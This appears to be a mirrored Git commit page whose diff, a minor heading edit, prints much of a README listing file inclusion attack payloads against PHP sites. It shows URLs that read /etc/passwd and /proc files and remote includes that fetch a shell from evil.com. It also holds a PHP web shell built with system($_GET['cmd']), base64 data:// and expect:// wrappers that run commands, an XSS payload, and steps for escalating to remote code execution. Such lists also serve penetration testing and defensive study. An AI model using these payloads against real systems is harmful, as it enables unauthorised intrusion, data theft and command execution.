External/rfi-lfi-payload-list
1
0
Fork 0
mirror of https://github.com/payloadbox/rfi-lfi-payload-list.git synced 2025-12-29 16:15:08 +00:00
Code Issues Packages Projects Releases Wiki Activity

Update README.md

Browse Source
This commit is contained in:
İsmail Taşdelen
2019-11-04 07:01:34 +03:00
committed by GitHub
parent b6f02d9135
commit cc272fee81
1 changed files with 21 additions and 9 deletions
Download Patch File Download Diff File Expand all files Collapse all files

30
README.md
View File

@@ -88,7 +88,7 @@ return ($ input);
Now I hope you can see whats going on inside this function, so you can add yours. I would suggest using the str_replace () function and there are a lot of other functions to clear them. Be considerate and stop the RFI & LFI exploit frenzy!
#### Basic LFI (null byte, double encoding and other tricks)
#### Basic LFI (null byte, double encoding and other tricks) :
```
http://example.com/index.php?page=etc/passwd
@@ -114,7 +114,7 @@ Interesting files to check out :
/proc/cmdline
```
#### Basic RFI (null byte, double encoding and other tricks)
#### Basic RFI (null byte, double encoding and other tricks) :
```
http://example.com/index.php?page=http://evil.com/shell.txt
@@ -122,7 +122,7 @@ http://example.com/index.php?page=http://evil.com/shell.txt%00
http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt
```
#### LFI / RFI Wrappers
#### LFI / RFI Wrappers :
LFI Wrapper rot13 and base64 - php://filter case insensitive.
@@ -135,7 +135,7 @@ Can be chained with a compression wrapper.
http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
```
#### LFI Wrapper ZIP
#### LFI Wrapper ZIP :
```
echo "</pre><?php system($_GET['cmd']); ?></pre>" > payload.php;
@@ -146,32 +146,44 @@ rm payload.php
http://example.com/index.php?page=zip://shell.jpg%23payload.php
```
#### RFI Wrapper DATA with "" payload
#### RFI Wrapper DATA with "" payload :
```
http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
```
#### RFI Wrapper EXPECT
#### RFI Wrapper EXPECT :
```
http://example.com/index.php?page=php:expect://id
http://example.com/index.php?page=php:expect://ls
```
#### XSS via RFI/LFI with "" payload
#### XSS via RFI/LFI with "" payload :
```
http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+
```
#### LFI to RCE via /proc/*/fd
#### LFI to RCE via /proc/*/fd :
1. Upload a lot of shells (for example : 100)
2. Include http://example.com/index.php?page=/proc/$PID/fd/$FD with $PID = PID of the process (can be bruteforced) and $FD the filedescriptor (can be bruteforced too)
#### LFI to RCE via Upload
#### LFI to RCE via Upload :
```
http://example.com/index.php?page=path/to/uploaded/file.png
```
#### References :
👉 [Testing for Local File Inclusion](https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion)
👉 [Wikipedia](www.wikipedia.org/wiki/Local_File_Inclusion)
👉 [Remote File Inclusion](http://projects.webappsec.org/w/page/13246955/Remote%20File%20Inclusion)
👉 [Wikipedia: "Remote File Inclusion"](http://en.wikipedia.org/wiki/Remote_File_Inclusion)
👉 [PHP File Inclusion](https://www.owasp.org/index.php/PHP_File_Inclusion)